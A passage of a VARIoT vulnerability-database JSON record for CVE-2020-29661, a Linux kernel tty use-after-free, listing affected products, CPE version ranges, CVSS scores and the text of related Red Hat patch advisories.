    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202012-1546",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.26"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.14.212"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.5"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "10.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      },
      {
        "model": "tekelec platform distribution",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "7.7.1"
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "32"
      },
      {
        "model": "tekelec platform distribution",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "7.4.0"
      },
      {
        "model": "active iq unified manager",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.4.248"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.15"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.5"
      },
      {
        "model": "solidfire baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.9.14"
      },
      {
        "model": "fabric operating system",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "broadcom",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.4.83"
      },
      {
        "model": "a700s",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "8700",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "a400",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.19.163"
      },
      {
        "model": "8300",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "fedora",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "fedoraproject",
        "version": "33"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.20"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.9.248"
      },
      {
        "model": "h410c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.10"
      },
      {
        "model": "kernel",
        "scope": null,
        "trust": 0.8,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "fedora",
        "scope": null,
        "trust": 0.8,
        "vendor": "fedora",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014190"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-29661"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.4.83",
                "versionStartIncluding": "4.20",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "5.9.14",
                "versionStartIncluding": "5.5",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.4.248",
                "versionStartIncluding": "2.6.26",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.9.248",
                "versionStartIncluding": "4.5",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.14.212",
                "versionStartIncluding": "4.10",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "4.19.163",
                "versionStartIncluding": "4.15",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vmware_vsphere:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:broadcom:fabric_operating_system:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:solidfire_baseboard_management_controller_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:solidfire_baseboard_management_controller:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:h410c_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:h410c:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:a700s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:a700s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:8300_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:8300:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:8700_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:8700:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:a400_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:a400:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:oracle:tekelec_platform_distribution:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "7.7.1",
                "versionStartIncluding": "7.4.0",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-29661"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Red Hat",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "161656"
      },
      {
        "db": "PACKETSTORM",
        "id": "161607"
      },
      {
        "db": "PACKETSTORM",
        "id": "161835"
      },
      {
        "db": "PACKETSTORM",
        "id": "161742"
      },
      {
        "db": "PACKETSTORM",
        "id": "161710"
      },
      {
        "db": "PACKETSTORM",
        "id": "162028"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-778"
      }
    ],
    "trust": 1.2
  },
  "cve": "CVE-2020-29661",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.2,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 3.9,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Local",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.2,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2020-29661",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.8,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.8,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2020-29661",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "Low",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2020-29661",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202012-778",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2020-29661",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2020-29661"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014190"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-778"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-29661"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "A locking issue was discovered in the tty subsystem of the Linux kernel through 5.9.13. drivers/tty/tty_jobctrl.c allows a use-after-free attack against TIOCSPGRP, aka CID-54ffccbf053b. Linux Kernel contains a resource locking vulnerability and a freed memory usage vulnerability. Vendors must CID-54ffccbf053b It is published as.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. \n\nRed Hat Advanced Cluster Management for Kubernetes provides the\ncapabilities to address common challenges that administrators and site\nreliability engineers face as they work across a range of public and\nprivate cloud environments. Clusters and applications are all visible and\nmanaged from a single console\u2014with security policy built in. \n\nBug fix:\n\n* RHACM 2.0.8 images (BZ #1915461)\n\n3. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):\n\n1915461 - RHACM 2.0.8 images\n1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation\n\n5. 8.1) - ppc64le, x86_64\n\n3. Description:\n\nThis is a kernel live patch module which is automatically loaded by the RPM\npost-install script to modify the code of a running kernel. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Important: kernel-rt security and bug fix update\nAdvisory ID:       RHSA-2021:0857-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2021:0857\nIssue date:        2021-03-16\nCVE Names:         CVE-2019-19532 CVE-2020-0427 CVE-2020-7053 \n                   CVE-2020-14351 CVE-2020-25211 CVE-2020-25645 \n                   CVE-2020-25656 CVE-2020-25705 CVE-2020-28374 \n                   CVE-2020-29661 CVE-2021-20265 \n=====================================================================\n\n1. Summary:\n\nAn update for kernel-rt is now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux for Real Time (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux for Real Time for NFV (v. 7) - noarch, x86_64\n\n3. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. \n\nSecurity Fix(es):\n\n* kernel: Local buffer overflow in ctnetlink_parse_tuple_filter in\nnet/netfilter/nf_conntrack_netlink.c (CVE-2020-25211)\n\n* kernel: SCSI target (LIO) write to any block on ILO backstore\n(CVE-2020-28374)\n\n* kernel: locking issue in drivers/tty/tty_jobctrl.c can lead to an\nuse-after-free (CVE-2020-29661)\n\n* kernel: malicious USB devices can lead to multiple out-of-bounds write\n(CVE-2019-19532)\n\n* kernel: out-of-bounds reads in pinctrl subsystem. (CVE-2020-0427)\n\n* kernel: use-after-free in i915_ppgtt_close in\ndrivers/gpu/drm/i915/i915_gem_gtt.c (CVE-2020-7053)\n\n* kernel: performance counters race condition use-after-free\n(CVE-2020-14351)\n\n* kernel: Geneve/IPsec traffic may be unencrypted between two Geneve\nendpoints (CVE-2020-25645)\n\n* kernel: use-after-free in read in vt_do_kdgkb_ioctl (CVE-2020-25656)\n\n* kernel: ICMP rate limiting can be used for DNS poisoning attack\n(CVE-2020-25705)\n\n* kernel: increase slab leak leads to DoS (CVE-2021-20265)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nBug Fix(es):\n\n* kernel-rt: update to the latest RHEL7.9.z4 source tree (BZ#1917909)\n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1781821 - CVE-2019-19532 kernel: malicious USB devices can lead to multiple out-of-bounds write\n1795624 - CVE-2020-7053 kernel: use-after-free in i915_ppgtt_close in drivers/gpu/drm/i915/i915_gem_gtt.c\n1862849 - CVE-2020-14351 kernel: performance counters race condition use-after-free\n1877571 - CVE-2020-25211 kernel: Local buffer overflow in ctnetlink_parse_tuple_filter in net/netfilter/nf_conntrack_netlink.c\n1883988 - CVE-2020-25645 kernel: Geneve/IPsec traffic may be unencrypted between two Geneve endpoints\n1888726 - CVE-2020-25656 kernel: use-after-free in read in vt_do_kdgkb_ioctl\n1894579 - CVE-2020-25705 kernel: ICMP rate limiting can be used for DNS poisoning attack\n1899804 - CVE-2020-28374 kernel: SCSI target (LIO) write to any block on ILO backstore\n1906525 - CVE-2020-29661 kernel: locking issue in drivers/tty/tty_jobctrl.c can lead to an use-after-free\n1908827 - CVE-2021-20265 kernel: increase slab leak leads to DoS\n1919893 - CVE-2020-0427 kernel: out-of-bounds reads in pinctrl subsystem. \n\n6. Package List:\n\nRed Hat Enterprise Linux for Real Time for NFV (v. 7):\n\nSource:\nkernel-rt-3.10.0-1160.21.1.rt56.1158.el7.src.rpm\n\nnoarch:\nkernel-rt-doc-3.10.0-1160.21.1.rt56.1158.el7.noarch.rpm\n\nx86_64:\nkernel-rt-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm\nkernel-rt-debug-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm\nkernel-rt-debug-debuginfo-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm\nkernel-rt-debug-devel-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm\nkernel-rt-debug-kvm-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm\nkernel-rt-debug-kvm-debuginfo-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm\nkernel-rt-debuginfo-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm\nkernel-rt-debuginfo-common-x86_64-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm\nkernel-rt-devel-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm\nkernel-rt-kvm-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm\nkernel-rt-kvm-debuginfo-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm\nkernel-rt-trace-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm\nkernel-rt-trace-debuginfo-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm\nkernel-rt-trace-devel-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm\nkernel-rt-trace-kvm-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm\nkernel-rt-trace-kvm-debuginfo-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm\n\nRed Hat Enterprise Linux for Real Time (v. 7):\n\nSource:\nkernel-rt-3.10.0-1160.21.1.rt56.1158.el7.src.rpm\n\nnoarch:\nkernel-rt-doc-3.10.0-1160.21.1.rt56.1158.el7.noarch.rpm\n\nx86_64:\nkernel-rt-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm\nkernel-rt-debug-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm\nkernel-rt-debug-debuginfo-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm\nkernel-rt-debug-devel-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm\nkernel-rt-debuginfo-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm\nkernel-rt-debuginfo-common-x86_64-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm\nkernel-rt-devel-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm\nkernel-rt-trace-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm\nkernel-rt-trace-debuginfo-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm\nkernel-rt-trace-devel-3.10.0-1160.21.1.rt56.1158.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2019-19532\nhttps://access.redhat.com/security/cve/CVE-2020-0427\nhttps://access.redhat.com/security/cve/CVE-2020-7053\nhttps://access.redhat.com/security/cve/CVE-2020-14351\nhttps://access.redhat.com/security/cve/CVE-2020-25211\nhttps://access.redhat.com/security/cve/CVE-2020-25645\nhttps://access.redhat.com/security/cve/CVE-2020-25656\nhttps://access.redhat.com/security/cve/CVE-2020-25705\nhttps://access.redhat.com/security/cve/CVE-2020-28374\nhttps://access.redhat.com/security/cve/CVE-2020-29661\nhttps://access.redhat.com/security/cve/CVE-2021-20265\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYFC6bdzjgjWX9erEAQiwXxAAhIAhzEH8blkm3BJaBDqVxbrvZCqhDxwD\n6AWik1+tfhHX7z/NoAirvjUw9lcla5CBck5q43HnHbeD9/JR6zuNlH9Lia6gCAmc\niEtyzq/BhgTf31xZWc42Dul/yHaMXq0zxwr21oXygrEApL/Lr0wGpvxolZFaQyfj\nNKyxdnalxAfyok/Ow1smJ+Hj9RHlLc89ZH1ZjpuO+L2xTDH1eZ98U0Q1s91MRBh0\noFuRvfR/+7DpCwMYT0KcY04VtpcB70u4awYVDx7ObkF5+8a3JIJk1ORiEzI/lp21\n0No+cTmtndQ3+Yf4l3WlvcOXs6Ac1kJVBkLJI+wA7TKmoPgPCHrOWj95cVu3PEey\nk5+4VbGRTGeq6ulwDua6wqwT3Jn2VmjNl+3pQDb50DqvPDfBfbH0tuqnmE98Frta\nWupiGPW0lMZZcBxfscIYe6mgCfYJ7dFkIK6ELCIpysjCTPJN+/y9W7TnDw3tQo/k\nJ1er8l6kJvSeauoUq9q4lijWb1C6ZpXpge7J1VlfKNP4DSZUODb8tNInFHW++aQU\nA1ujIGH6lJF6hBFbsh9ORW7eK1nkT0m8OCqN6pffWPJ5oeNyYm+7vQ5Cf+TN83Vz\nXMcW2HIpo6qzThIAxIQ9PE68cfhgtFk1pD06d2OVZNYnmuFvs2SAkpCo2JDZ3nCp\nZtp7AlQNK9g=\n=j5Z8\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. \n\nThis advisory contains the following OpenShift Virtualization 2.6.0 images:\n\nRHEL-8-CNV-2.6\n=============kubevirt-cpu-node-labeller-container-v2.6.0-5\nkubevirt-cpu-model-nfd-plugin-container-v2.6.0-5\nnode-maintenance-operator-container-v2.6.0-13\nkubevirt-vmware-container-v2.6.0-5\nvirtio-win-container-v2.6.0-5\nkubevirt-kvm-info-nfd-plugin-container-v2.6.0-5\nbridge-marker-container-v2.6.0-9\nkubevirt-template-validator-container-v2.6.0-9\nkubevirt-v2v-conversion-container-v2.6.0-6\nkubemacpool-container-v2.6.0-13\nkubevirt-ssp-operator-container-v2.6.0-40\nhyperconverged-cluster-webhook-container-v2.6.0-73\nhyperconverged-cluster-operator-container-v2.6.0-73\novs-cni-plugin-container-v2.6.0-10\ncnv-containernetworking-plugins-container-v2.6.0-10\novs-cni-marker-container-v2.6.0-10\ncluster-network-addons-operator-container-v2.6.0-16\nhostpath-provisioner-container-v2.6.0-11\nhostpath-provisioner-operator-container-v2.6.0-14\nvm-import-virtv2v-container-v2.6.0-21\nkubernetes-nmstate-handler-container-v2.6.0-19\nvm-import-controller-container-v2.6.0-21\nvm-import-operator-container-v2.6.0-21\nvirt-api-container-v2.6.0-111\nvirt-controller-container-v2.6.0-111\nvirt-handler-container-v2.6.0-111\nvirt-operator-container-v2.6.0-111\nvirt-launcher-container-v2.6.0-111\ncnv-must-gather-container-v2.6.0-54\nvirt-cdi-importer-container-v2.6.0-24\nvirt-cdi-cloner-container-v2.6.0-24\nvirt-cdi-controller-container-v2.6.0-24\nvirt-cdi-uploadserver-container-v2.6.0-24\nvirt-cdi-apiserver-container-v2.6.0-24\nvirt-cdi-uploadproxy-container-v2.6.0-24\nvirt-cdi-operator-container-v2.6.0-24\nhco-bundle-registry-container-v2.6.0-582\n\nSecurity Fix(es):\n\n* golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows\nfor panic (CVE-2020-9283)\n\n* golang: crypto/ssh: crafted authentication request can lead to nil\npointer dereference (CVE-2020-29652)\n\n* gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index\nvalidation (CVE-2021-3121)\n\n* golang.org/x/text: possibility to trigger an infinite loop in\nencoding/unicode could lead to crash (CVE-2020-14040)\n\n* golang: data race in certain net/http servers including ReverseProxy can\nlead to DoS (CVE-2020-15586)\n\n* golang: ReadUvarint and ReadVarint can read an unlimited number of bytes\nfrom invalid inputs (CVE-2020-16845)\n\n* jwt-go: access restriction bypass vulnerability (CVE-2020-26160)\n\n* golang-github-gorilla-websocket: integer overflow leads to denial of\nservice (CVE-2020-27813)\n\n* golang: math/big: panic during recursive division of very large numbers\n(CVE-2020-28362)\n\n* containernetworking-cni: Arbitrary path injection via type field in CNI\nconfiguration (CVE-2021-20206)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. Bugs fixed (https://bugzilla.redhat.com/):\n\n1732329 - Virtual Machine is missing documentation of its properties in yaml editor\n1783192 - Guest kernel panic when start RHEL6.10 guest with q35 machine type and virtio disk in cnv\n1791753 - [RFE] [SSP] Template validator should check validations in template\u0027s parent template\n1804533 - CVE-2020-9283 golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows for panic\n1848954 - KMP missing CA extensions  in cabundle of mutatingwebhookconfiguration\n1848956 - KMP  requires downtime for CA stabilization during certificate rotation\n1853652 - CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash\n1853911 - 